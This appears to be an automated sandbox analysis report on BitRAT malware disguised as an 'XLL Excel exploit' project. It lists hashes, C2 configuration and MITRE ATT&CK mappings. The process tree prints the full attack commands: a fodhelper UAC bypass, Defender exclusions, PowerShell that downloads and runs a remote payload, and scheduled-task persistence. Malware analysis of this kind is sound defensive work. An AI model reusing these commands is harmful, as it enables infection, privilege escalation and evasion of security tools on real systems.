Overview

overview

10

Static

static

XLL-EXCEL-...on.vbs

windows10-2004-x64

1

XLL-EXCEL-...ml.vbs

windows10-2004-x64

1

XLL-EXCEL-...fo.bat

windows10-2004-x64

10

XLL-EXCEL-...es.vbs

windows10-2004-x64

1

XLL-EXCEL-...ls.scr

windows10-2004-x64

10

Analysis

  • max time kernel
    106s
  • max time network
    109s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220812-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
  • submitted
    18-09-2022 18:33

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    XLL-EXCEL-EXPLOIT--main/XLL EXCEL EXPLOIT/project‮nls.scr

  • Size

    90KB

  • MD5

    f257db29d0439adc56190a15a6336b90

  • SHA1

    7e974d2a767fa11832a0ae08f490d26ad552aebb

  • SHA256

    21e2dbf71e3f8f5c26914792ef4889d7a85cba85420e467917e7f1bd4ee56dd0

  • SHA512

    8503c5e71cb6e9232527431a527b21dccd0d60baa1b69e560a334b2d7a682cd51c8e21942e83e1d1202426fd7434e88da9c7197420ed116c4780e78ef49a4dbe

  • SSDEEP

    96:/WKqcNOUKaSG7BzIIt//JROTTcliIG8xmmPM+MSpiME7zGM62l1FsfjvKZtttttz:/W0NOUKaFvaAmH762nmK89u1

Score
10/10
bitratevasiontrojan

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://asamyz.com/ini.exe

Extracted

Family

bitrat

Version

1.38

C2

wwww.ddnsgeek.com:59599

Attributes
  • communication_password

    32c93a52f919c37c05b22825e5a57a4a

  • tor_process

    tor

Signatures

  • BitRAT

    BitRAT is a remote access tool written in C++ and uses leaked source code from other families.

    trojanbitrat
  • UAC bypass 3 TTPs 1 IoCs
    evasiontrojan
  • Blocklisted process makes network request 1 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 2 IoCs
  • Sets file to hidden 1 TTPs 2 IoCs

    Modifies file attributes to stop it showing in Explorer etc.

    evasion
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Suspicious use of NtSetInformationThreadHideFromDebugger 6 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Creates scheduled task(s) 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistence
  • Delays execution with timeout.exe 1 IoCs
    evasion
  • Kills process with taskkill 1 IoCs
    evasion
  • Modifies registry class 7 IoCs
  • Modifies registry key 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 8 IoCs
  • Suspicious use of AdjustPrivilegeToken 7 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 39 IoCs
  • Views/modifies file attributes 1 TTPs 2 IoCs
    evasion

Processes

  • C:\Users\Admin\AppData\Local\Temp\XLL-EXCEL-EXPLOIT--main\XLL EXCEL EXPLOIT\project‮nls.scr
    "C:\Users\Admin\AppData\Local\Temp\XLL-EXCEL-EXPLOIT--main\XLL EXCEL EXPLOIT\project‮nls.scr" /S
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:4304
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\XLL-EXCEL-EXPLOIT--main\XLL EXCEL EXPLOIT\packages\info.bat" "
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:4992
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\XLL-EXCEL-EXPLOIT--main\XLL EXCEL EXPLOIT\packages\info.bat"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4936
        • C:\Windows\system32\reg.exe
          REG ADD "HKCU\SOFTWARE\ClAsses\ms-settings\shell\open\commAnd" /t REG_SZ /d "C:\windows\SYStem32\cmd.exe /c REG ADD HKLM\soFtwARE\micRosoFt\windows\cuRREntveRsion\policies\SYStem /v ConsentPRomptBehAvioRAdmin /t REG_DWORD /d 0 /F" /F
          4⤵
          • Modifies registry class
          PID:2276
        • C:\Windows\system32\reg.exe
          REG ADD "hkcu\soFtwARE\clAsses\ms-settings\shell\open\commAnd" /v DelegAteExecute /t REG_SZ /d " " /F
          4⤵
          • Modifies registry class
          PID:2680
        • C:\Windows\system32\fodhelper.exe
          FodhelpeR.exe
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:1812
          • C:\windows\SYStem32\cmd.exe
            "C:\windows\SYStem32\cmd.exe" /c REG ADD HKLM\soFtwARE\micRosoFt\windows\cuRREntveRsion\policies\SYStem /v ConsentPRomptBehAvioRAdmin /t REG_DWORD /d 0 /F
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:540
            • C:\Windows\system32\reg.exe
              REG ADD HKLM\soFtwARE\micRosoFt\windows\cuRREntveRsion\policies\SYStem /v ConsentPRomptBehAvioRAdmin /t REG_DWORD /d 0 /F
              6⤵
              • UAC bypass
              • Modifies registry key
              PID:4540
        • C:\Windows\SYStem32\cacls.exe
          "C:\Windows\SYStem32\cAcls.exe" "C:\Windows\SYStem32\conFig\SYStem"
          4⤵
            PID:748
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            poWERshell.exe -c "ADD-MpPREFeREnce -ExclusionExtension ".bat""
            4⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2904
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            poWERshell.exe -c "ADD-MpPREFeREnce -ExclusionExtension ".exe""
            4⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2596
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            poWERshell.exe -c (New-Object System.Net.WebClient).DownloadFile('http://asamyz.com/ini.exe','C:\Users\Admin\profile\svchost.exe');Start-Process 'C:\Users\Admin\profile\svchost.exe'
            4⤵
            • Blocklisted process makes network request
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:2040
            • C:\Users\Admin\profile\svchost.exe
              "C:\Users\Admin\profile\svchost.exe"
              5⤵
              • Executes dropped EXE
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of SetWindowsHookEx
              PID:3168
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            poWERshell.exe -c "Start-Process -FilePath schtasks -ArgumentList '/Create', '/sc ONLOGON', '/tn profile', '/IT', '/rl HIGHEST', '/TR', \"C:\Users\Admin\profile\svchost.exe\" -verb RunAs"
            4⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:4220
            • C:\Windows\system32\schtasks.exe
              "C:\Windows\system32\schtasks.exe" /Create /sc ONLOGON /tn profile /IT /rl HIGHEST /TR C:\Users\Admin\profile\svchost.exe
              5⤵
              • Creates scheduled task(s)
              PID:3212
          • C:\Windows\system32\schtasks.exe
            schtasks /create /sc minute /mo 2 /tn "spawn" /tr C:\Users\Admin\profile\svchost.exe
            4⤵
            • Creates scheduled task(s)
            PID:3764
          • C:\Windows\system32\attrib.exe
            attrib +S +H C:\Users\Admin\profile
            4⤵
            • Sets file to hidden
            • Views/modifies file attributes
            PID:4672
          • C:\Windows\system32\attrib.exe
            attrib +S +H C:\Users\Admin\profile\svchost.exe
            4⤵
            • Sets file to hidden
            • Views/modifies file attributes
            PID:1612
          • C:\Windows\system32\timeout.exe
            timeout /T 3
            4⤵
            • Delays execution with timeout.exe
            PID:4772
          • C:\Windows\system32\taskkill.exe
            taskkill /F /IM cmd.exe
            4⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:1884
    • C:\Users\Admin\profile\svchost.exe
      C:\Users\Admin\profile\svchost.exe
      1⤵
      • Executes dropped EXE
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • Suspicious use of AdjustPrivilegeToken
      PID:3036

    Network

    MITRE ATT&CK Matrix ATT&CK v6

    Initial Access

    Execution

    Scheduled Task

    1
    T1053

    Persistence

    Hidden Files and Directories

    2
    T1158

    Scheduled Task

    1
    T1053

    Privilege Escalation

    Bypass User Account Control

    1
    T1088

    Scheduled Task

    1
    T1053

    Defense Evasion

    Bypass User Account Control

    1
    T1088

    Disabling Security Tools

    1
    T1089

    Modify Registry

    2
    T1112

    Hidden Files and Directories

    2
    T1158

    Credential Access

    Discovery

    Query Registry

    1
    T1012

    System Information Discovery

    2
    T1082

    Lateral Movement

    Collection

    Exfiltration

    Command and Control

    Impact

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
      Filesize

      2KB

      MD5

      d85ba6ff808d9e5444a4b369f5bc2730

      SHA1

      31aa9d96590fff6981b315e0b391b575e4c0804a

      SHA256

      84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

      SHA512

      8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

      Download Submit
    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
      Filesize

      944B

      MD5

      bd5940f08d0be56e65e5f2aaf47c538e

      SHA1

      d7e31b87866e5e383ab5499da64aba50f03e8443

      SHA256

      2d2f364c75bd2897504249f42cdf1d19374f5230aad68fa9154ea3d03e3031a6

      SHA512

      c34d10c7e07da44a180fae9889b61f08903aa84e8ddfa80c31c272b1ef9d491b8cec6b8a4c836c3cb1583fe8f4955c6a8db872515de3a9e10eae09610c959406

      Download Submit
    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
      Filesize

      944B

      MD5

      5cfe303e798d1cc6c1dab341e7265c15

      SHA1

      cd2834e05191a24e28a100f3f8114d5a7708dc7c

      SHA256

      c4d16552769ca1762f6867bce85589c645ac3dc490b650083d74f853f898cfab

      SHA512

      ef151bbe0033a2caf2d40aff74855a3f42c8171e05a11c8ce93c7039d9430482c43fe93d9164ee94839aff253cad774dbf619dde9a8af38773ca66d59ac3400e

      Download Submit
    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
      Filesize

      1KB

      MD5

      dfaae5f3c96bca0fa2edba259573d14d

      SHA1

      f21aa6ba7a823499ee39ed47de6ec65886b30c63

      SHA256

      434301dc57e6261328bc04cac4ffdaf03b4c525d81519cc599ab60d1761551ea

      SHA512

      b60e4e4cd39a9432e2fc9897bf81bbda8a56eee24d559f1effb369dd1745311e004849a9dc4e2b8921bf526edc8caf263a6bc974612da23ed16816e98b17d2ba

      Download Submit
    • C:\Users\Admin\profile\svchost.exe
      Filesize

      3.8MB

      MD5

      221e0fa159b0892c04254280d9a46674

      SHA1

      fbe9558c1bf14a8ec59b918084de51d6f7d9037b

      SHA256

      8ac53eb721a6ae815a870b81dad63a155c6518e20a84735550ed1f83dd380eb7

      SHA512

      084f35c331ec3c5a19dde1e5531b82206f2b5c2b0b3d315e72fca824890a4480141448c2fd22f65a00ffcb9de64103fe9e95282906154f6d24857be64a8ef8f9

      Download Submit
    • C:\Users\Admin\profile\svchost.exe
      Filesize

      3.8MB

      MD5

      221e0fa159b0892c04254280d9a46674

      SHA1

      fbe9558c1bf14a8ec59b918084de51d6f7d9037b

      SHA256

      8ac53eb721a6ae815a870b81dad63a155c6518e20a84735550ed1f83dd380eb7

      SHA512

      084f35c331ec3c5a19dde1e5531b82206f2b5c2b0b3d315e72fca824890a4480141448c2fd22f65a00ffcb9de64103fe9e95282906154f6d24857be64a8ef8f9

      Download Submit
    • C:\Users\Admin\profile\svchost.exe
      Filesize

      3.8MB

      MD5

      221e0fa159b0892c04254280d9a46674

      SHA1

      fbe9558c1bf14a8ec59b918084de51d6f7d9037b

      SHA256

      8ac53eb721a6ae815a870b81dad63a155c6518e20a84735550ed1f83dd380eb7

      SHA512

      084f35c331ec3c5a19dde1e5531b82206f2b5c2b0b3d315e72fca824890a4480141448c2fd22f65a00ffcb9de64103fe9e95282906154f6d24857be64a8ef8f9

      Download Submit
    • memory/540-139-0x0000000000000000-mapping.dmp
      Download
    • memory/748-141-0x0000000000000000-mapping.dmp
      Download
    • memory/1612-166-0x0000000000000000-mapping.dmp
      Download
    • memory/1812-138-0x0000000000000000-mapping.dmp
      Download
    • memory/1884-170-0x0000000000000000-mapping.dmp
      Download
    • memory/2040-156-0x00007FFDE02F0000-0x00007FFDE0DB1000-memory.dmp
      Filesize

      10.8MB

      Download
    • memory/2040-153-0x00007FFDE02F0000-0x00007FFDE0DB1000-memory.dmp
      Filesize

      10.8MB

      Download
    • memory/2040-151-0x0000000000000000-mapping.dmp
      Download
    • memory/2276-136-0x0000000000000000-mapping.dmp
      Download
    • memory/2596-146-0x0000000000000000-mapping.dmp
      Download
    • memory/2596-149-0x00007FFDE02F0000-0x00007FFDE0DB1000-memory.dmp
      Filesize

      10.8MB

      Download
    • memory/2596-150-0x00007FFDE02F0000-0x00007FFDE0DB1000-memory.dmp
      Filesize

      10.8MB

      Download
    • memory/2680-137-0x0000000000000000-mapping.dmp
      Download
    • memory/2904-142-0x0000000000000000-mapping.dmp
      Download
    • memory/2904-144-0x00007FFDE02F0000-0x00007FFDE0DB1000-memory.dmp
      Filesize

      10.8MB

      Download
    • memory/2904-143-0x000001CF61920000-0x000001CF61942000-memory.dmp
      Filesize

      136KB

      Download
    • memory/2904-145-0x00007FFDE02F0000-0x00007FFDE0DB1000-memory.dmp
      Filesize

      10.8MB

      Download
    • memory/3036-172-0x0000000000400000-0x00000000007CE000-memory.dmp
      Filesize

      3.8MB

      Download
    • memory/3168-168-0x00000000746B0000-0x00000000746E9000-memory.dmp
      Filesize

      228KB

      Download
    • memory/3168-154-0x0000000000000000-mapping.dmp
      Download
    • memory/3168-174-0x0000000074A30000-0x0000000074A69000-memory.dmp
      Filesize

      228KB

      Download
    • memory/3168-173-0x00000000746B0000-0x00000000746E9000-memory.dmp
      Filesize

      228KB

      Download
    • memory/3168-159-0x0000000000400000-0x00000000007CE000-memory.dmp
      Filesize

      3.8MB

      Download
    • memory/3168-169-0x0000000074A30000-0x0000000074A69000-memory.dmp
      Filesize

      228KB

      Download
    • memory/3212-162-0x0000000000000000-mapping.dmp
      Download
    • memory/3764-164-0x0000000000000000-mapping.dmp
      Download
    • memory/4220-163-0x00007FFDE02F0000-0x00007FFDE0DB1000-memory.dmp
      Filesize

      10.8MB

      Download
    • memory/4220-160-0x00007FFDE02F0000-0x00007FFDE0DB1000-memory.dmp
      Filesize

      10.8MB

      Download
    • memory/4220-157-0x0000000000000000-mapping.dmp
      Download
    • memory/4304-135-0x00007FFDE02F0000-0x00007FFDE0DB1000-memory.dmp
      Filesize

      10.8MB

      Download
    • memory/4304-132-0x00000000004E0000-0x00000000004FC000-memory.dmp
      Filesize

      112KB

      Download
    • memory/4540-140-0x0000000000000000-mapping.dmp
      Download
    • memory/4672-165-0x0000000000000000-mapping.dmp
      Download
    • memory/4772-167-0x0000000000000000-mapping.dmp
      Download
    • memory/4936-134-0x0000000000000000-mapping.dmp
      Download
    • memory/4992-133-0x0000000000000000-mapping.dmp
      Download